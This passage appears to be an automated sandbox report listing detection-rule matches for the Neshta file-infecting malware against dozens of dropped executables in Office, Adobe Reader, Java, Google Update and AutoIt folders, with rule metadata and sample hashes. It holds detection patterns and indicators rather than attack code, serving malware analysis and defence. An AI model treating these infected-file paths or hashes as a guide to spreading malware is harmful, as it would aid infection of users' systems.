                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
